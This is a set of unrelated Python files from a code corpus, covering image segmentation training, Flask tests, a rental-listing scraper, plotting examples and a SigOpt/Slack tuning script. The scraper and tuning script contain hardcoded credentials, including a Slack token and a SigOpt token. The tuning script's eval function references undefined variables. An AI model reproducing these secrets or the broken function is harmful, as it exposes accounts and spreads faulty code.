padding=False, batch_norm=True, up_mode='upconv').to(device=device)\n\n elif model_name == 'Segnet':\n\n model = SegNet(in_ch=input_channel, width=width, norm=norm, depth=4, n_classes=no_class, dropout=True, side_output=False).to(device=device)\n\n elif model_name == 'SOASNet_single':\n\n model = SOASNet_ss(in_ch=input_channel, width=width, depth=depth, norm=norm, n_classes=no_class, mode='low_rank_attn', side_output=False, downsampling_limit=depth_limit).to(device=device)\n\n elif model_name == 'SOASNet':\n\n model = SOASNet(in_ch=input_channel, width=width, depth=depth, norm=norm, n_classes=no_class, mode='low_rank_attn', side_output=False, downsampling_limit=depth_limit).to(device=device)\n\n elif model_name == 'SOASNet_large_kernel':\n\n model = SOASNet_ls(in_ch=input_channel, width=width, depth=depth, norm=norm, n_classes=no_class, mode='low_rank_attn', side_output=False, downsampling_limit=depth_limit).to(device=device)\n\n elif model_name == 'SOASNet_multi_attn':\n\n model = SOASNet_ma(in_ch=input_channel, width=width, depth=depth, norm=norm, n_classes=no_class, mode='low_rank_attn', side_output=False, downsampling_limit=depth_limit).to(device=device)\n\n elif model_name == 'SOASNet_very_large_kernel':\n\n model = SOASNet_vls(in_ch=input_channel, width=width, depth=depth, norm=norm, n_classes=no_class, mode='low_rank_attn', side_output=False, downsampling_limit=depth_limit).to(device=device)\n\n elif model_name == 'SOASNet_segnet':\n\n model = SOASNet_segnet(in_ch=input_channel, width=width, depth=depth, norm=norm, n_classes=no_class, mode='low_rank_attn', side_output=False, downsampling_limit=depth_limit).to(device=device)\n\n elif model_name == 'SOASNet_segnet_skip':\n\n model = SOASNet_segnet_skip(in_ch=input_channel, width=width, depth=depth, norm=norm, n_classes=no_class, mode='low_rank_attn', side_output=False, downsampling_limit=depth_limit).to(device=device)\n\n elif model_name == 'RelayNet':\n\n model = SOASNet_segnet_skip(in_ch=input_channel, width=width, depth=depth, norm=norm, n_classes=no_class, mode='relaynet', side_output=False, downsampling_limit=depth_limit).to(device=device)\n\n elif model_name == 'attn_unet':\n\n model = AttentionUNet(in_ch=input_channel, width=width, visulisation=False, class_no=no_class).to(device=device)\n\n # ==================================\n training_amount = len(train_dataset)\n iteration_amount = training_amount // train_batch\n iteration_amount = iteration_amount - 1\n\n model_name = model_name + '_Epoch_' + str(epochs) + \\\n '_Dataset_' + data_name + \\\n '_Batch_' + str(train_batch) + \\\n '_Width_' + str(width) + \\\n '_Loss_' + loss + \\\n '_Norm_' + norm + \\\n '_ShuffleTraining_' + str(shuffle) + \\\n '_Data_Augmentation_Train_' + data_augmentation_train + '_' + \\\n '_Data_Augmentation_Test_' + data_augmentation_test + '_' + \\\n '_lr_' + str(lr) + \\\n '_Repeat_' + str(repeat)\n\n print(model_name)\n\n writer = SummaryWriter('../../Log_' + log + '/' + model_name)\n\n optimizer = AdamW(model.parameters(), lr=lr, betas=(0.9, 0.999), eps=1e-8, weight_decay=1e-5)\n\n # if lr_scedule is True:\n # learning_rate_steps = lr_scheduler.StepLR(optimizer, step_size=50, gamma=0.1)\n\n for epoch in range(epochs):\n\n model.train()\n\n running_loss = 0\n\n # i: index of mini batch\n if 'mixup' not in data_augmentation_train:\n\n for j, (images, labels, imagename) in enumerate(train_loader):\n\n images = images.to(device=device, dtype=torch.float32)\n\n if no_class == 2:\n\n labels = labels.to(device=device, dtype=torch.float32)\n\n else:\n\n labels = labels.to(device=device, dtype=torch.long)\n\n outputs_logits = model(images)\n\n optimizer.zero_grad()\n\n # calculate main losses for second time\n if no_class == 2:\n #\n if loss == 'dice':\n #\n main_loss = dice_loss(torch.sigmoid(outputs_logits), labels)\n #\n elif loss == 'ce':\n #\n main_loss = nn.BCEWithLogitsLoss(reduction='mean')(outputs_logits, labels)\n #\n elif loss == 'hybrid':\n #\n main_loss = dice_loss(torch.sigmoid(outputs_logits), labels) + nn.BCEWithLogitsLoss(reduction='mean')(outputs_logits, labels)\n\n else:\n\n # print(outputs_logits.shape)\n\n # print(labels.shape)\n\n main_loss = nn.CrossEntropyLoss(reduction='mean', ignore_index=8)(torch.softmax(outputs_logits, dim=1), labels.squeeze(1))\n\n running_loss += main_loss\n\n main_loss.backward()\n\n optimizer.step()\n\n # ==============================================================================\n # Calculate training and validation metrics at the last iteration of each epoch\n # ==============================================================================\n\n if (j + 1) % iteration_amount == 0:\n\n if no_class == 2:\n\n outputs = torch.sigmoid(outputs_logits)\n\n # outputs = (outputs > 0.5).float()\n\n else:\n\n _, outputs = torch.max(outputs_logits, dim=1)\n\n # outputs = outputs.unsqueeze(1)\n\n labels = labels.squeeze(1)\n\n # print(outputs.shape)\n\n # print(labels.shape)\n\n # mean_iu = segmentation_scores(labels.cpu().detach().numpy(), outputs.cpu().detach().numpy(), no_class)\n\n mean_iu = intersectionAndUnion(outputs.cpu().detach(), labels.cpu().detach(), no_class)\n\n validate_iou, validate_f1, validate_recall, validate_precision = evaluate(data=validate_data, model=model, device=device, class_no=no_class)\n\n # print(validate_iou.type)\n\n print(\n 'Step [{}/{}], '\n 'loss: {:.5f}, '\n 'train iou: {:.5f}, '\n 'val iou: {:.5f}'.format(epoch + 1,\n epochs,\n running_loss / (j + 1),\n mean_iu,\n validate_iou))\n\n writer.add_scalars('scalars', {'train iou': mean_iu,\n 'val iou': validate_iou,\n 'val f1': validate_f1,\n 'val recall': validate_recall,\n 'val precision': validate_precision}, epoch + 1)\n\n else:\n # mix-up strategy requires more calculations:\n\n for j, (images_1, labels_1, imagename_1, images_2, labels_2, mixed_up_image, lam) in enumerate(train_loader):\n\n mixed_up_image = mixed_up_image.to(device=device, dtype=torch.float32)\n lam = lam.to(device=device, dtype=torch.float32)\n\n if no_class == 2:\n labels_1 = labels_1.to(device=device, dtype=torch.float32)\n labels_2 = labels_2.to(device=device, dtype=torch.float32)\n else:\n labels_1 = labels_1.to(device=device, dtype=torch.long)\n labels_2 = labels_2.to(device=device, dtype=torch.long)\n\n outputs_logits = model(mixed_up_image)\n\n optimizer.zero_grad()\n\n # calculate main losses for second time\n if no_class == 2:\n\n if loss == 'dice':\n\n main_loss = lam * dice_loss(torch.sigmoid(outputs_logits), labels_1) + (1 - lam) * dice_loss(torch.sigmoid(outputs_logits), labels_2)\n\n elif loss == 'ce':\n\n main_loss = lam * nn.BCEWithLogitsLoss(reduction='mean')(outputs_logits, labels_1) + (1 - lam) * nn.BCEWithLogitsLoss(reduction='mean')(outputs_logits, labels_2)\n\n elif loss == 'hybrid':\n\n main_loss = lam * dice_loss(torch.sigmoid(outputs_logits), labels_1) \\\n + (1 - lam) * dice_loss(torch.sigmoid(outputs_logits), labels_2) \\\n + lam * nn.BCEWithLogitsLoss(reduction='mean')(outputs_logits, labels_1) \\\n + (1 - lam) * nn.BCEWithLogitsLoss(reduction='mean')(outputs_logits, labels_2)\n\n elif no_class == 8:\n\n main_loss = lam * nn.CrossEntropyLoss(reduction='mean')(outputs_logits, labels_1.squeeze(1)) + (1 - lam) * nn.CrossEntropyLoss(reduction='mean')(outputs_logits, labels_2.squeeze(1))\n\n else:\n main_loss = lam * nn.CrossEntropyLoss(reduction='mean')(outputs_logits, labels_1.squeeze(1)) + (1 - lam) * nn.CrossEntropyLoss(reduction='mean')(outputs_logits, labels_2.squeeze(1))\n\n running_loss += main_loss.mean()\n\n main_loss.mean().backward()\n\n optimizer.step()\n\n # ==============================================================================\n # Calculate training and validation metrics at the last iteration of each epoch\n # ==============================================================================\n if (j + 1) % iteration_amount == 0:\n\n if no_class == 2:\n\n outputs = torch.sigmoid(outputs_logits)\n\n else:\n\n _, outputs = torch.max(outputs_logits, dim=1)\n\n outputs = outputs.unsqueeze(1)\n\n mean_iu_1 = segmentation_scores(labels_1.cpu().detach().numpy(), outputs.cpu().detach().numpy(), no_class)\n\n mean_iu_2 = segmentation_scores(labels_2.cpu().detach().numpy(), outputs.cpu().detach().numpy(), no_class)\n\n mean_iu = lam.data.sum() * mean_iu_1 + (1 - lam.data.sum()) * mean_iu_2\n\n validate_iou, validate_f1, validate_recall, validate_precision = evaluate(data=validate_data, model=model, device=device, class_no=no_class)\n\n mean_iu = mean_iu.item()\n\n print(\n 'Step [{}/{}], '\n 'loss: {:.4f}, '\n 'train iou: {:.4f}, '\n 'val iou: {:.4f}'.format(epoch + 1,\n epochs,\n running_loss / (j + 1),\n mean_iu,\n validate_iou))\n\n writer.add_scalars('scalars', {'train iou': mean_iu,\n 'val iou': validate_iou,\n 'val f1': validate_f1,\n 'val recall': validate_recall,\n 'val precision': validate_precision}, epoch + 1)\n\n if lr_scedule is True:\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr*((1 - epoch / epochs)**0.999)\n\n # save model\n save_folder = '../../saved_models_' + log\n\n try:\n\n os.makedirs(save_folder)\n\n except OSError as exc:\n\n if exc.errno != errno.EEXIST:\n\n raise\n pass\n\n save_model_name = model_name + '_Final'\n\n save_model_name_full = save_folder + '/' + save_model_name + '.pt'\n\n torch.save(model, save_model_name_full)\n # =======================================================================\n # testing (disabled during training, because it is too slow)\n # =======================================================================\n save_results_folder = save_folder + '/testing_results_' + model_name\n\n try:\n os.makedirs(save_results_folder)\n except OSError as exc:\n if exc.errno != errno.EEXIST:\n raise\n pass\n\n test_iou_1, test_f1_1, test_recall_1, test_precision_1, mse_1, test_iou_2, test_f1_2, test_recall_2, test_precision_2, mse_2, outputs_1, outputs_2 = test(data_1=test_data_1,\n data_2=test_data_2,\n model=model,\n device=device,\n class_no=no_class,\n save_location=save_results_folder)\n\n print(\n 'test iou data 1: {:.4f}, '\n 'test mse data 1: {:.4f}, '\n 'test f1 data 1: {:.4f},'\n 'test recall data 1: {:.4f}, '\n 'test precision data 1: {:.4f}, '.format(test_iou_1,\n mse_1,\n test_f1_1,\n test_recall_1,\n test_precision_1))\n\n print(\n 'test iou data 2: {:.4f}, '\n 'test mse data 2: {:.4f}, '\n 'test f1 data 2: {:.4f},'\n 'test recall data 2: {:.4f}, '\n 'test precision data 2: {:.4f}, '.format(test_iou_2,\n mse_2,\n test_f1_2,\n test_recall_2,\n test_precision_2))\n\n print('\\nTesting finished and results saved.\\n')\n\n return save_model_name_full\n\n\n","sub_path":"OCT_train.py","file_name":"OCT_train.py","file_ext":"py","file_size_in_byte":24771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"141175424","text":"\nimport json\n\nfrom client import TestCase\nfrom fixtures_states import data as states\nfrom fixtures_companies import data as companies\nfrom fixtures_labs import data as labs\nfrom fixtures_sites import data as sites\nfrom fixtures_substance_groups import data as substance_groups\nfrom fixtures_substances import data as substances\nfrom fixtures_wells import data as wells\nfrom fixtures_schedules import data as schedules\nfrom fixtures_samples import data as samples\nfrom fixtures_sample_values import data as sample_values\n\nfrom sampleserve.core import db\nfrom sampleserve.users.models import (\n Company,\n Lab,\n)\nfrom sampleserve.substances.models import State\nfrom sampleserve.sites.models import (\n Site,\n Schedule,\n)\nfrom sampleserve.substances.models import (\n SubstanceGroup,\n Substance,\n)\nfrom sampleserve.wells.models import Well\nfrom sampleserve.samples.models import (\n Sample,\n SampleValue,\n)\n\n\nclass SamplesTestCase(TestCase):\n def setUp(self):\n with self.app.app_context():\n for row in labs:\n db.session.add(Lab(*row))\n\n db.session.commit()\n\n for row in companies:\n db.session.add(Company(*row))\n\n db.session.commit()\n\n for row in states:\n db.session.add(State(*row))\n\n db.session.commit()\n\n for row in sites:\n db.session.add(Site(*row))\n\n db.session.commit()\n\n for row in substance_groups:\n db.session.add(SubstanceGroup(*row))\n\n db.session.commit()\n\n for row in substances:\n db.session.add(Substance(*row))\n\n for row in wells:\n db.session.add(Well(*row))\n\n for row in schedules:\n db.session.add(Schedule(*row))\n\n db.session.commit()\n\n for row in samples:\n db.session.add(Sample(*row))\n\n db.session.commit()\n\n for row in sample_values:\n db.session.add(SampleValue(*row))\n\n db.session.commit()\n\n def test_index(self):\n rv = self.client.get('/api/v1/samples/', base_url='http://test.sampleserve.dev')\n assert rv.status_code == 200\n\n def test_create_incomplete(self):\n rv = self.post('/api/v1/samples/', {'title': 'Test'}, base_url='http://test.sampleserve.dev')\n assert rv.status_code == 422\n\n def test_show(self):\n rv = self.client.get('/api/v1/samples/3', base_url='http://test.sampleserve.dev')\n assert rv.status_code == 200\n\n def test_edit(self):\n rv = self.patch('/api/v1/samples/3', {'active': False}, base_url='http://test.sampleserve.dev')\n assert rv.status_code == 200\n data = json.loads(rv.data)\n assert data['active'] == False\n\n def test_delete(self):\n rv = self.client.delete('/api/v1/samples/3', base_url='http://test.sampleserve.dev')\n assert rv.status_code == 204\n","sub_path":"tests/test_samples.py","file_name":"test_samples.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"464558191","text":"#\n# @lc app=leetcode id=1344 lang=python\n#\n# [1344] Angle Between Hands of a Clock\n#\n\n# @lc code=start\n\nclass Solution:\n def angleClock(self, hour: int, minutes: int) -> float:\n minuteAngle = 6 * minutes\n hourAngle = (hour % 12) * 30 + (minutes/60 * 30)\n result = abs(minuteAngle - hourAngle) % 360\n inverse = 360 - result\n return result if result < inverse else inverse\n\n# @lc code=end\n","sub_path":"Leetcode/1344.angle-between-hands-of-a-clock.py","file_name":"1344.angle-between-hands-of-a-clock.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"225515066","text":"#coding:utf-8\n\npermis=list(range(30000,100000))\nprint(permis)\n\npermis2=list(range(0,10))\n\npermis3=list(range(10,100))\n\npermis4=list(range(100,1000))\n\npermis5=list(range(1000,10000))\n\npermis6=list(range(10000,18000))\n# print(permis+permis2+permis3+permis4+permis5+permis6)\n\nfor permi in permis:\n print('{}'.format(permi))\n\nfor permi2 in permis2:\n print('0000{}'.format(permi2))\n \nfor permi3 in permis3:\n print('000{}'.format(permi3))\n \nfor permi4 in permis4:\n print('00{}'.format(permi4))\n \nfor permi5 in permis5:\n print('0{}'.format(permi5))\n \nfor permi6 in permis6:\n print('{}'.format(permi6))\n\n# Solution astucieuse, mais il est possible de rédiger un script plus court.\n# Voici l'une de mes propositions:\n\nfor a in range(1930,2018): # Boucle qui passe toutes les années de 1930 à 2017\n\tfor x in range(1001,2000): # Boucle qui passe les 1000 numéros de permis possible à chaque année\n\t# J'imprime ensuite un assemblage fait de :\n\t# D'abord, je transforme les années en «string» (chaîne de caractères) et je n'en conserve que les deux derniers caractères\n\t# Puis je transforme aussi en «string» les nombres générés par la 2e boucle (qui va de 1000 à 1999) et je n'en conserve que les trois derniers caractères\n\t\tprint(str(a)[2:] + str(x)[1:])","sub_path":"devoir1JHR.py","file_name":"devoir1JHR.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"438804421","text":"from flask import Flask\n\napp = Flask(__name__)\n\n\n@app.route('/')\n@app.route('/')\ndef index(name='world'):\n return \"\"\"\n\n\n \n Flat HTML\n \n \n

Hello {}

\n \n\n \"\"\".format(name)\n\n\napp.run(debug=True)\n","sub_path":"treehouse/basics/html/flat_html.py","file_name":"flat_html.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"489031886","text":"\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nfile = \"Images/hair1.jpg\"\n\n# Reading the image\nimg = cv2.imread(file)\n\n# converted into RGB colors\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\nimgGray = cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)\n#Convert two D image into 3 D\nimgGray= cv2.cvtColor(imgGray, cv2.COLOR_GRAY2RGB)\n\n\n# Negative Image\nimgInv= cv2.bitwise_not(img)\n\n# Flips image\nimgflip= cv2.flip(img,0) # 0 for vertical flip and 1 for horizontal flip\n\n\nplt.subplot(141)\nplt.imshow(img)\nplt.title(\"Original\")\n\nplt.subplot(142)\nplt.imshow(imgGray)\nplt.title(\"gray\")\n\nplt.subplot(143)\nplt.imshow(imgInv)\nplt.title(\"invert\")\n#\nplt.subplot(144)\nplt.imshow(imgflip)\nplt.title(\"Flip\")\n\n\nplt.show()\n\n\n\n# Wait until any key is pressed\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n","sub_path":"ImageOperations/GrayInvert.py","file_name":"GrayInvert.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"531891015","text":"import os\n\ndef Question45():\n try:\n read_file = open(os.getcwd()+\"/Chapter08/Question45_example.txt\", 'r')\n file_str = read_file.read()\n read_file.close()\n \n print(\"Input file string : \")\n print(file_str, end=\"\\n\\n\")\n \n count = file_str.count(\"utilize\")\n print(\"Input file \\\"use\\\" string count : {0:d}\".format(count), end=\"\\n\\n\")\n \n print(\"Output file string : \")\n re_file_str = file_str.replace(\"utilize\", \"use\")\n print(re_file_str)\n \n write_file = open(os.getcwd()+\"/Chapter08/Question45_result.txt\", 'w')\n write_file.write(re_file_str) \n write_file.close()\n except IOError as err:\n print(err)\n \n ","sub_path":"CodingTraining/PythonStudy/Chapter08/Question45.py","file_name":"Question45.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"277414521","text":"#!/usr/bin/env python\n# Ben's scratchpad for testing\n\n## Imports\nimport os\nimport pandas as pd\nimport yellowbrick as yb\nimport matplotlib.pyplot as plt\n\nfrom pandas.tools.plotting import radviz, parallel_coordinates\nfrom yellowbrick.features import ParallelCoordinates, RadViz, Rank2D\n\n## Module Constants - the path to the test data sets\nFIXTURES = os.path.join(os.path.dirname(__file__), \"examples\", \"data\")\n\n## Dataset loading mechanisms\ndatasets = {\n \"credit\": os.path.join(FIXTURES, \"credit.xls\"),\n \"concrete\": os.path.join(FIXTURES, \"concrete.xls\"),\n \"occupancy\": os.path.join(FIXTURES, 'occupancy', 'datatraining.txt'),\n}\n\n## Human readable column names\ncolumns = {\n \"credit\": [\n 'id', 'limit', 'sex', 'edu', 'married', 'age', 'apr_delay', 'may_delay',\n 'jun_delay', 'jul_delay', 'aug_delay', 'sep_delay', 'apr_bill', 'may_bill',\n 'jun_bill', 'jul_bill', 'aug_bill', 'sep_bill', 'apr_pay', 'may_pay', 'jun_pay',\n 'jul_pay', 'aug_pay', 'sep_pay', 'default'\n ],\n \"concrete\": [\n 'cement', 'slag', 'ash', 'water', 'splast',\n 'coarse', 'fine', 'age', 'strength'\n ],\n \"occupancy\": [\n 'date', 'temp', 'humid', 'light', 'co2', 'hratio', 'occupied'\n ],\n}\n\n\ndef load_data(name):\n \"\"\"\n Loads and wrangls the passed in dataset.\n \"\"\"\n\n path = datasets[name]\n data = {\n 'credit': lambda p: pd.read_excel(p, header=1),\n 'concrete': lambda p: pd.read_excel(p),\n 'occupancy': lambda p: pd.read_csv(p),\n }[name](path)\n\n data.columns = columns[name]\n return data\n\n\ndef test_parallel_coords(pandas=False, outpath=None):\n \"\"\"\n Runs the parallel coordinates visualizer on the dataset.\n\n Parameters\n ----------\n pandas : bool\n Run the pandas version of the function\n outpath : path or None\n Save the figure to disk rather than show (if None)\n \"\"\"\n data = load_data('occupancy') # Load the data\n features = ['temp', 'humid', 'light', 'co2', 'hratio']\n classes = ['unoccupied', 'occupied']\n X = data[features].as_matrix()\n y = data.occupied.as_matrix()\n\n if pandas:\n parallel_coordinates(data[features + ['occupied']], 'occupied')\n if outpath:\n plt.savefig(outpath)\n else:\n plt.show()\n\n else:\n visualizer = ParallelCoordinates( # Instantiate the visualizer\n classes=classes, features=features\n )\n visualizer.fit(X, y) # Fit the data to the visualizer\n visualizer.transform(X) # Transform the data\n visualizer.poof(outpath=outpath) # Draw/show/poof the data\n\n\ndef test_radviz(pandas=False, outpath=None):\n \"\"\"\n Runs the radviz visualizer on the dataset.\n\n Parameters\n ----------\n pandas : bool\n Run the pandas version of the function\n outpath : path or None\n Save the figure to disk rather than show (if None)\n \"\"\"\n data = load_data('occupancy') # Load the data\n features = ['temp', 'humid', 'light', 'co2', 'hratio']\n classes = ['unoccupied', 'occupied']\n X = data[features].as_matrix()\n y = data.occupied.as_matrix()\n\n if pandas:\n radviz(data[features + ['occupied']], 'occupied')\n if outpath:\n plt.savefig(outpath)\n else:\n plt.show()\n\n else:\n visualizer = RadViz( # Instantiate the visualizer\n classes=classes, features=features\n )\n visualizer.fit(X, y) # Fit the data to the visualizer\n visualizer.transform(X) # Transform the data\n visualizer.poof(outpath=outpath) # Draw/show/poof the data\n\n\ndef test_rank2d(seaborn=False, outpath=None):\n \"\"\"\n Runs the radviz visualizer on the dataset.\n\n Parameters\n ----------\n pandas : bool\n Run the pandas version of the function\n outpath : path or None\n Save the figure to disk rather than show (if None)\n \"\"\"\n data = load_data('occupancy') # Load the data\n features = ['temp', 'humid', 'light', 'co2', 'hratio']\n classes = ['unoccupied', 'occupied']\n X = data[features].as_matrix()\n y = data.occupied.as_matrix()\n\n if seaborn:\n raise NotImplementedError(\"Not yet!\")\n\n else:\n visualizer = Rank2D(features=features, algorithm='covariance')\n visualizer.fit(X, y) # Fit the data to the visualizer\n visualizer.transform(X) # Transform the data\n visualizer.poof(outpath=outpath) # Draw/show/poof the data\n\n\nif __name__ == '__main__':\n # test_parallel_coords(pandas=True)\n # test_radviz(pandas=False, outpath='/Users/benjamin/Desktop/yb_radviz.png')\n test_rank2d(outpath='/Users/benjamin/Desktop/yb_rank2d_covariance.png')\n","sub_path":"examples/examples.py","file_name":"examples.py","file_ext":"py","file_size_in_byte":4766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"57305906","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom os import path\nfrom wordcloud import WordCloud, ImageColorGenerator\nimport jieba.analyse\nimport matplotlib.pyplot as plt\nfrom scipy.misc import imread\nimport time\nfrom pymongo import MongoClient\n\n\n\nclass HouseSpider:\n def __init__(self):\n self.client = MongoClient('mongodb://localhost:27017/')\n self.zfdb = self.client.zfdb\n self.zfdb.authenticate(\"admin\", \"123456\")\n\n session = requests.Session()\n baseUrl = \"http://zu.fang.com\"\n\n urlDir = {\n \"不限\": \"/house/\",\n \"朝阳\": \"/house-a01/\",\n \"海淀\": \"/house-a00/\",\n \"丰台\": \"/house-a06/\",\n \"东城\": \"/house-a02/\",\n \"西城\": \"/house-a03/\",\n \"石景山\": \"/house-a07/\",\n \"昌平\": \"/house-a012/\",\n \"大兴\": \"/house-a0585/\",\n \"通州\": \"/house-a010/\",\n \"顺义\": \"/house-a011/\",\n \"房山\": \"/house-a08/\",\n \"密云\": \"/house-a013/\",\n \"门头沟\":\"/house-a09/\",\n \"怀柔\":\"/house-a014/\",\n \"延庆\":\"/house-a015/\",\n \"平谷\":\"/house-a016/\",\n \"燕郊\":\"/house-a0987/\",\n \"北京周边\": \"/house-a011817/\",#香河,大厂,固安等\n }\n region = \"不限\"\n page = 100\n # 通过名字获取 url 地址\n def getRegionUrl(self, name=\"朝阳\", page=10):\n urlList = []\n for index in range(page):\n if index == 0:\n urlList.append(self.baseUrl + self.urlDir[name])\n else:\n urlList.append(self.baseUrl + self.urlDir[name] + \"i3\" + str(index + 1) + \"/\")\n\n return urlList\n\n\n # MongoDB 存储数据结构\n def getRentMsg(self, title, rooms, area, price, address, traffic, region, direction):\n return {\n \"title\": title, # 标题\n \"rooms\": rooms, # 房间数\n \"area\": area, # 平方数\n \"price\": price, # 价格\n \"address\": address, # 地址\n \"traffic\": traffic, # 交通描述\n \"region\": region, # 区、(福田区、南山区)\n \"direction\": direction, # 房子朝向(朝南、朝南北)\n }\n\n # 获取数据库 collection\n def getCollection(self, name):\n zfdb = self.zfdb\n if name == \"不限\":\n return zfdb.rent_bj\n if name == \"朝阳\":\n return zfdb.cy_bj\n if name == \"海淀\":\n return zfdb.hd_bj\n if name == \"丰台\":\n return zfdb.ft_bj\n if name == \"东城\":\n return zfdb.dc_bj\n if name == \"西城\":\n return zfdb.xc_bj\n if name == \"石景山\":\n return zfdb.sjs_bj\n if name == \"昌平\":\n return zfdb.cp_bj\n if name == \"通州\":\n return zfdb.tz_bj\n if name == \"顺义\":\n return zfdb.sy_bj\n if name == \"大兴\":\n return zfdb.dx_bj\n if name == \"房山\":\n return zfdb.fs_bj\n if name == \"门头沟\":\n return zfdb.mtg_bj\n if name == \"密云\":\n return zfdb.my_bj\n if name == \"延庆\":\n return zfdb.yq_bj\n if name == \"怀柔\":\n return zfdb.hr_bj\n if name == \"平谷\":\n return zfdb.pg_bj\n if name == \"燕郊\":\n return zfdb.yj_bj\n\n\n def getOnePageData(self, pageUrl, reginon=\"不限\"):\n rent = self.getCollection(self.region)\n self.session.headers.update({\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36'})\n res = self.session.get(\n pageUrl\n )\n soup = BeautifulSoup(res.text, \"html.parser\")\n divs = soup.find_all(\"dd\", attrs={\"class\": \"info rel\"}) # 获取需要爬取得 div\n for div in divs:\n ps = div.find_all(\"p\")\n try: # 捕获异常,因为页面中有些数据没有被填写完整,或者被插入了一条广告,则会没有相应的标签,所以会报错\n for index, p in enumerate(ps): # 从源码中可以看出,每一条 p 标签都有我们想要的信息,故在此遍历 p 标签,\n text = p.text.strip()\n print(text) # 输出看看是否为我们想要的信息\n print(\"===================================\")\n # 爬取并存进 MongoDB 数据库\n roomMsg = ps[1].text.split(\"|\")\n # rentMsg 这样处理是因为有些信息未填写完整,导致对象报空\n area = roomMsg[2].strip()[:len(roomMsg[2]) - 2]\n rentMsg = self.getRentMsg(\n ps[0].text.strip(),\n roomMsg[1].strip(),\n int(float(area)),\n int(ps[len(ps) - 1].text.strip()[:len(ps[len(ps) - 1].text.strip()) - 3]),\n ps[2].text.strip(),\n ps[3].text.strip(),\n ps[2].text.strip()[:2],\n roomMsg[3],\n )\n rent.insert(rentMsg)\n except:\n continue\n\n\n def setRegion(self, region):\n self.region = region\n\n def setPage(self, page):\n self.page = page\n\n def startSpicder(self):\n for url in self.getRegionUrl(self.region, self.page):\n self.getOnePageData(url, self.region)\n print(\"=================== one page 分割线 ===========================\")\n print(\"=================== one page 分割线 ===========================\")\n print(\"=================== one page 分割线 ===========================\")\n time.sleep(5)\n\n\nspider = HouseSpider()\nspider.setPage(10)# 设置爬取页数\nspider.setRegion(\"燕郊\")# 设置爬取区域\nspider.startSpicder()# 开启爬虫\n","sub_path":"houseSpyderBJ.py","file_name":"houseSpyderBJ.py","file_ext":"py","file_size_in_byte":5855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"182449605","text":"#!/usr/bin/python\nfrom sigopt import Connection\nfrom slackclient import SlackClient\nimport subprocess\nimport click\n\n@click.command()\n@click.option('--iterations', default=0, type=int, \n\t\t\t help='Quantity of evaluation iterations (if default then iterations equals expermient´s observation budget)')\n@click.option('--delete_obs', is_flag=True, \n\t\t\t help='Delete previous observations')\ndef eval(iterations):\n\t\"\"\"Makes an eval loop between sigopt and the CNN code.\"\"\"\n\tconn = Connection(client_token=\"REKZSVNIITYEDUTODXTSUXEJRACOBDIOKLAPBNRCGZXWQQAC\")\n\texperiment = conn.experiments(52578)\n\texperiment.suggestions().delete()\n\n\tif iterations == 0:\n\t\titerations = experiment.observation_budget\n\n\tif delete_obs: \t\n\t\texperiment.observations().delete()\n\n\tfor _ in range(iterations):\n\t\tsuggestion = experiment.suggestions().create()\n\t\tprint(\"Iteración\", _ + 1)\n\t\tprint(\"Learning rate:\", suggestion.assignments['alpha'])\n\t\tvalue = evaluate_model(suggestion.assignments)\n\t\texperiment.observations().create(\n\t\t\tsuggestion=suggestion.id,\n\t\t\tvalue=value,\n\t\t)\n\n\tmsg = \"La recompensa final es igual a: {:.2f}\".format(reward)\n\tprint(msg)\n\tslack_push(msg)\n\ndef slack_push(msg):\n\t\"\"\"Sends a message to thesis slack channel.\n\n\tKeyword arguments:\n\tmsg -- String that defines the message\n\t\"\"\"\n\ttoken = 'xoxp-422129945285-421269443440-432589457383-5239bf7d291ed71c82470912ed0291de'\n\tsc = SlackClient(token)\n\tsc.api_call('chat.postMessage', channel='tesis',\n\t\t\t\ttext=msg, username='Programa Python',\n\t\t\t\ticon_emoji=':robot_face:')\n\ndef evaluate_model(assignments):\n\t\"\"\"Evaluates the model and returns the reward.\n\n\tKeyword arguments:\n\tassignments -- Suggested params from the sigopt system\n\t\"\"\"\n\tlearning_rate = assignments['alpha']\n\tcommand = ('AI train --learning_rate={:.4f}'.format(learning_rate))\n\n\tp = subprocess.Popen(command, universal_newlines=True, shell=True, \n\t\t\t\t\t\t stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\ttext = p.stdout.read()\n\tretcode = p.wait()\n\n\treward = float(text.splitlines()[-1])\n\tmsg = \"La recompensa es igual a: {:.2f}\".format(reward)\n\tprint(msg)\n\tslack_push(msg)\n\treturn reward\n\n","sub_path":"AI/sgtlink.py","file_name":"sgtlink.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"410572462","text":"import os\nimport re\nimport collections\nimport csv\n\nTOTAL_WORDS = 0\n\n\ndef order_text(directory):\n \"\"\"\n :return: text without punctuation or numbers\n \"\"\"\n\n text = \"\"\n\n for i in os.listdir(directory):\n text = text + \" \"\n if i.endswith(\".txt\"):\n f = open(os.path.join(directory, i), 'r', encoding=\"utf-8\")\n 